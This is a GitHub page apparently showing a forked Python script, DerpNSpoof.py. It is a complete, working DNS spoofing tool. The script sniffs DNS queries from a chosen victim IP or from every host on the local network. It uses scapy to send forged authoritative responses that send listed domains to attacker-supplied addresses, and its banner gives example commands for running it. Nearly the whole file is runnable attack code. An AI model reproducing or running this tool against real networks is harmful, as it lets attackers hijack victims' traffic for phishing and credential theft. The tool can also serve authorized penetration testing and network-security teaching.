forked from Trackbool/DerpNSpoof
-
Notifications
You must be signed in to change notification settings - Fork 0
/
DerpNSpoof.py
130 lines (113 loc) · 5.22 KB
/
DerpNSpoof.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#coded by: @adrianfa5
import os
import sys
import re
import socket
#Dictionary with console color codes to print text
colors = {'HEADER' : "\033[95m",
'OKBLUE' : "\033[94m",
'RED' : "\033[91m",
'OKYELLOW' : "\033[93m",
'GREEN' : "\033[92m",
'LIGHTBLUE' : "\033[96m",
'WARNING' : "\033[93m",
'FAIL' : "\033[91m",
'ENDC' : "\033[0m",
'BOLD' : "\033[1m",
'UNDERLINE' : "\033[4m" }
def menu():
print (colors['WARNING']+" ____ _____ _____ ___ "+colors['ENDC'])
print (colors['WARNING']+"| \ ___ ___ ___ | | || __| ___ ___ ___ | _|"+colors['ENDC'])
print (colors['WARNING']+"| | || -_|| _|| . || | | ||__ || . || . || . || _| "+colors['ENDC'])
print (colors['WARNING']+"|____/ |___||_| | _||_|___||_____|| _||___||___||_| "+colors['ENDC'])
print (colors['WARNING']+" |_| |_| "+colors['ENDC'])
print (colors['GREEN']+" Coded by Adrián Fernández Arnal-(@adrianfa5)"+colors['ENDC'])
print ()
print (" --------------------------------------")
print (colors['LIGHTBLUE']+" [!] Options to use:"+colors['ENDC'])
print (colors['LIGHTBLUE']+" <ip> - Spoof the DNS query packets of a certain IP address"+colors['ENDC'])
print (colors['LIGHTBLUE']+" <all> - Spoof the DNS query packets of all hosts"+colors['ENDC'])
print (colors['LIGHTBLUE']+" [!] Examples:"+colors['ENDC'])
print (colors['LIGHTBLUE']+" # python3 DerpNSpoof.py 192.168.1.20 myfile.txt"+colors['ENDC'])
print (colors['LIGHTBLUE']+" # python3 DerpNSpoof.py all myfile.txt"+colors['ENDC'])
print (" --------------------------------------")
menu()
#Checks if an IP passed as arg is a valid IP address
def valid_ip(address):
try:
socket.inet_aton(address)
return True
except:
return False
#Gets the local IP address to avoid self spoofing
def check_local_ip():
local_ip = os.popen("ip route | grep 'src' | awk {'print $9'}").read().strip()
while True:
if(valid_ip(local_ip)): break
else: local_ip = input(colors['WARNING']+" [!] Cannot get your local IP addres, please write it: "+colors['ENDC']).strip()
return local_ip
local_ip = check_local_ip()
#Checks args length
if len(sys.argv) != 3:
print (' [i] Usage <victim_ip> <records_file>')
sys.exit(1)
else:
victim_ip = sys.argv[1]
path = sys.argv[2]
sniff_filter = 'udp dst port 53'
registers = {}
#Validates args format
def valid_args():
all_pkt = False
if(not valid_ip(victim_ip)):
if(victim_ip != 'all'):
print (colors['FAIL']+' [!] Invalid victim\'s IP address'+colors['ENDC'])
sys.exit(1)
else:
all_pkt = True
return all_pkt
all_pkt = valid_args();
#Loads the records file and save it into a Dictionary
def read_file(path):
if(os.path.isfile(path) and os.stat(path).st_size > 0 ):
file = open(path,"r")
for line in file:
if(line not in ['\n', '\r\n']):
try:
key,value = line.split()
registers[key] = value
if (not valid_ip(value)):
print(colors['WARNING']+" [!] Detected an invalid IP address in the file ["+value+"]"+colors['ENDC'])
sys.exit(1)
except:
print(colors['FAIL']+" [!] Invalid file format: <domain> <fake_address>"+colors['ENDC'])
sys.exit(1)
file.close()
else:
print(colors['FAIL']+" [!] The file doesn't exists or is empty"+colors['ENDC'])
sys.exit(1)
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
#Checks if all hosts are spoofed or not
def check_victims(pkt):
if(all_pkt and IP in pkt): result = True
elif(IP in pkt): result = (pkt[IP].src == victim_ip)
else: result = False
return result
#Checks if is a valid DNS query and sends a spoofed response
def fake_dns_response(pkt):
result = check_victims(pkt)
if (result and pkt[IP].src != local_ip and UDP in pkt and DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0 and str(pkt[DNSQR].qname)[2:len(str(pkt[DNSQR].qname))-2] in registers):
cap_domain = str(pkt[DNSQR].qname)[2:len(str(pkt[DNSQR].qname))-2]
fakeResponse = IP(dst=pkt[IP].src,src=pkt[IP].dst) / UDP(dport=pkt[UDP].sport,sport=53) / DNS(id=pkt[DNS].id,qd=pkt[DNS].qd,aa=1,qr=1, ancount=1,an=DNSRR(rrname=pkt[DNSQR].qname,rdata=registers[cap_domain]) / DNSRR(rrname=pkt[DNSQR].qname,rdata=registers[cap_domain]))
send(fakeResponse, verbose=0)
print(colors['GREEN']+" [#] Spoofed response sent to "+colors['ENDC']+"["+pkt[IP].src+"]"+colors['WARNING']+": Redirecting "+colors['ENDC']+"["+cap_domain+"]"+colors['WARNING']+" to "+colors['ENDC']+"["+registers[cap_domain]+"]")
def main():
read_file(path)
print(' [i] Spoofing DNS responses...')
sniff(prn=fake_dns_response, filter=sniff_filter, store=0)
if __name__ == "__main__":
main()